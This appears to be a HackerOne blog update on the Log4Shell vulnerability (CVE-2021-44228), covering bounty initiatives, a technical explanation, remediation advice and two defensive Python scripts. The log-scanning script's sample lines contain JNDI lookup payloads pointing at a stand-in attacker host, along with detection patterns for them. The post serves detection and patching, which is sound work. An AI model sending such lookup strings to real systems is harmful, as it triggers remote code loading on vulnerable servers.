December 14 Update: Several HackerOne customers have launched Log4j-specific initiatives for hackers who are already hunting, or want to start hunting, in their bug bounty programs. They include Glassdoor and Hyatt, among others. See below for more information:

Glassdoor—Glassdoor has patched most of the Log4j-vulnerable (CVE-2021-44228) applications over the weekend. If you happen to find any endpoints that are vulnerable to Log4Shell (CVE-2021-44228), please report it to us; we will pay double our critical bounty, up to $5,000. Detections in the form of pingbacks that include host information such as hostname or IP are acceptable and preferable. Please share your IP when you get the pingback so we can triage your reports faster.

For researchers interested in this initiative, go to https://hackerone.com/glassdoor.

Hyatt—We believe we have taken adequate steps to protect our external-facing environment—code assurance, detective controls, and protective controls—from the recently discovered vulnerability in the log4j library. We want to ensure we take all precautions to protect our guests and colleagues; therefore, throughout this week, ending Sunday, December 20, we are creating a super-critical category for successful remote code execution of CVE-2021-44228 on any in-scope assets. The payout for this category will be US$25,000. As always, thank you for your important contributions to the safety of our guests and colleagues. Happy hunting!

For researchers interested in this initiative, go to https://hackerone.com/hyatt.

The newly discovered critical zero-day vulnerability in the widely used Java logging library Apache Log4j is easy to exploit and lets attackers take full control of affected servers. Tracked as CVE-2021-44228, the vulnerability is classified as severe because it allows unauthenticated remote code execution. It is being actively exploited across the globe, and attacks exploiting Log4j continue to grow daily. The vulnerability was reported by Chen Zhaojun of the Alibaba Cloud Security Team and disclosed by The Apache Software Foundation on December 9th.

Technical Details of Log4j

The Log4j vulnerability (CVE-2021-44228) exists because Log4j interprets certain sequences in log messages as a lookup language, and one of that language's capabilities is to load and execute arbitrary Java classes. Because attacker-controlled input (for example, an HTTP header) is routinely written to logs, the result is a powerful remote code execution (RCE) vulnerability. The CVSS score is the highest possible, 10.0.
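The mechanism above suggests the first thing a defender can check in their own telemetry: whether the lookup syntax is appearing in fields that an outside party controls. The script below is an added example written for this post, not code from HackerOne or from the Apache Log4j project. It scans a few constructed web-server access lines (not real traffic) for any `${...}` lookup expression and flags those whose prefix is `jndi`, matching case-insensitively so that a changed-case prefix does not slip past. The sample lines, the `.invalid` hostnames, and the function names are all assumptions made for the example.

```python
import re
from typing import Dict, List

# Log4j's lookup syntax is "${prefix:argument}". A "jndi" prefix is the one that
# can resolve and load a remote Java class, so it is the strongest signal.
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)

# Any lookup at all: in fields that an external party fills in (User-Agent,
# query strings, headers), a "${" expression has no legitimate reason to appear.
ANY_LOOKUP = re.compile(r"\$\{[^}]*\}")

# Constructed sample access-log lines (not real traffic). The first is benign;
# the other two carry a lookup in externally controlled fields.
SAMPLE_LINES = [
    '10.0.0.5 - - [10/Dec/2021:08:01:02 +0000] "GET / HTTP/1.1" 200 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:08:01:03 +0000] "GET / HTTP/1.1" 200 "-" '
    '"${jndi:ldap://attacker.example.invalid/a}"',
    '10.0.0.7 - - [10/Dec/2021:08:01:04 +0000] "GET /?q=${JNDI:rmi://attacker.example.invalid/b} '
    'HTTP/1.1" 404 "-" "curl/7.79"',
]


def scan_line(line: str) -> Dict[str, object]:
    """Return every lookup found in the line and whether any of them is a JNDI lookup."""
    return {
        "line": line,
        "lookups": ANY_LOOKUP.findall(line),
        "jndi": JNDI_LOOKUP.search(line) is not None,
    }


def scan_lines(lines: List[str]) -> List[Dict[str, object]]:
    """Keep only lines that contain at least one lookup expression."""
    return [hit for hit in (scan_line(line) for line in lines) if hit["lookups"]]


def jndi_source_ips(lines: List[str]) -> List[str]:
    """Source addresses (first field) of lines that carried a JNDI lookup, in order."""
    return [hit["line"].split(" ", 1)[0] for hit in scan_lines(lines) if hit["jndi"]]


if __name__ == "__main__":
    for hit in scan_lines(SAMPLE_LINES):
        tag = "JNDI" if hit["jndi"] else "lookup"
        print(f"[{tag}] {hit['lookups']} <- {hit['line']}")
```

In a real deployment the same two patterns can be run over the fields of structured logs (User-Agent, Referer, X-Forwarded-For, request paths) as they are ingested, and a hit on the `jndi` prefix is the one to route to incident response first; a hit on any other lookup in an external field is still worth a look, since nothing outside the application should be emitting that syntax.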

To remediate this vulnerability, organizations must update all affected instances of Log4j to version 2.15.0. HackerOne recommends that our customers consider only a version update at this time, rather than relying on configuration workarounds.
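Updating "all affected instances" first requires finding them, and Log4j is usually present as a bundled `log4j-core` jar rather than something an inventory tool lists by name. The script below is an added example written for this post, not HackerOne's or Apache's tooling. It walks a directory tree, reads the Maven `pom.properties` that Maven-built `log4j-core` jars carry under `META-INF/maven/org.apache.logging.log4j/log4j-core/`, and compares the embedded version against the 2.15.0 threshold stated above. The threshold is a parameter so it can be raised as Apache's advisory is updated. The `demo()` function builds stand-in jars in a temporary directory (constructed for the example; they contain only the properties file, not Log4j itself); the function names are assumptions made for the example.

```python
import re
import tempfile
import zipfile
from pathlib import Path
from typing import List, Optional, Tuple

# Fixed version per the remediation guidance in this post; raise it as the
# Apache advisory is updated.
FIXED_VERSION: Tuple[int, int, int] = (2, 15, 0)

# Maven-built jars carry their coordinates and version here.
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"


def parse_version(text: str) -> Tuple[int, int, int]:
    """Turn '2.14.1' (or '2.15') into a comparable 3-tuple, padding missing parts with 0."""
    parts = [int(p) for p in re.findall(r"\d+", text)[:3]]
    while len(parts) < 3:
        parts.append(0)
    return (parts[0], parts[1], parts[2])


def log4j_core_version(jar_path: Path) -> Optional[Tuple[int, int, int]]:
    """Return the log4j-core version embedded in a jar, or None if the jar is not log4j-core."""
    with zipfile.ZipFile(jar_path) as zf:
        if POM_PROPS not in zf.namelist():
            return None
        for line in zf.read(POM_PROPS).decode("utf-8", "replace").splitlines():
            if line.startswith("version="):
                return parse_version(line.split("=", 1)[1].strip())
    return None


def needs_update(version: Tuple[int, int, int], fixed=FIXED_VERSION) -> bool:
    """True when the found version is older than the fixed release."""
    return version < fixed


def scan_directory(root: Path, fixed=FIXED_VERSION) -> List[Tuple[str, str, bool]]:
    """(jar name, version string, needs update) for every log4j-core jar under root."""
    findings = []
    for jar in sorted(root.rglob("*.jar")):
        version = log4j_core_version(jar)
        if version is not None:
            findings.append((jar.name, ".".join(map(str, version)), needs_update(version, fixed)))
    return findings


def make_sample_jar(path: Path, version: Optional[str]) -> Path:
    """Constructed stand-in jar for the demo: only a pom.properties, no Log4j classes."""
    with zipfile.ZipFile(path, "w") as zf:
        if version is None:
            zf.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\n")
        else:
            zf.writestr(POM_PROPS, f"version={version}\ngroupId=org.apache.logging.log4j\n"
                                   f"artifactId=log4j-core\n")
    return path


def demo() -> List[Tuple[str, str, bool]]:
    """Build three constructed jars (two log4j-core, one unrelated) and scan them."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "app" / "lib").mkdir(parents=True)
        make_sample_jar(root / "app" / "lib" / "log4j-core-2.14.1.jar", "2.14.1")
        make_sample_jar(root / "app" / "lib" / "log4j-core-2.15.0.jar", "2.15.0")
        make_sample_jar(root / "app" / "lib" / "other-lib-1.0.jar", None)
        return scan_directory(root)


if __name__ == "__main__":
    for name, version, stale in demo():
        print(f"{name}: {version} -> {'UPDATE REQUIRED' if stale else 'ok'}")
```

Note what this does not cover: a `log4j-core` jar shaded into another jar, or a copy under a renamed file, will have the properties file at the same path inside the nested archive, so a thorough scan also opens jars found inside jars (and WAR/EAR files) rather than stopping at the first layer.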

Apache’s official Log4j security advisory, including updated information, can be found here.

What HackerOne Has Done Internally

HackerOne identified several internal non-production services we run as tertiary architecture that were impacted by Log4j. We immediately put mitigations in place and patched them when the library updates were released. We believe we are fully remediated and continue to remain alert and vigilant. In addition, through our own Bug Bounty Program, we’ve announced a substantial bounty for any Log4j vulnerability exploits against HackerOne.

What HackerOne is Seeing With Customers

Since the Log4j vulnerability was first reported on December 9, HackerOne has received numerous submissions of Log4j vulnerabilities to customer programs. These raw counts may exceed the number of distinct vulnerable instances. See below for graphs of these reports.

HackerOne Report of Log4j Vulnerability Submissions by Day

Graph 1: Log4j Vulnerability Report Submissions by Day

HackerOne Report of Cumulative Log4j Vulnerability Report Submissions

Graph 2: HackerOne Cumulative Log4j Vulnerability Report Submissions

HackerOne will continue to monitor the Log4j vulnerability and its impact on the industry and our customers. We will regularly post updates regarding this significant cybersecurity event.

Posted by Charlie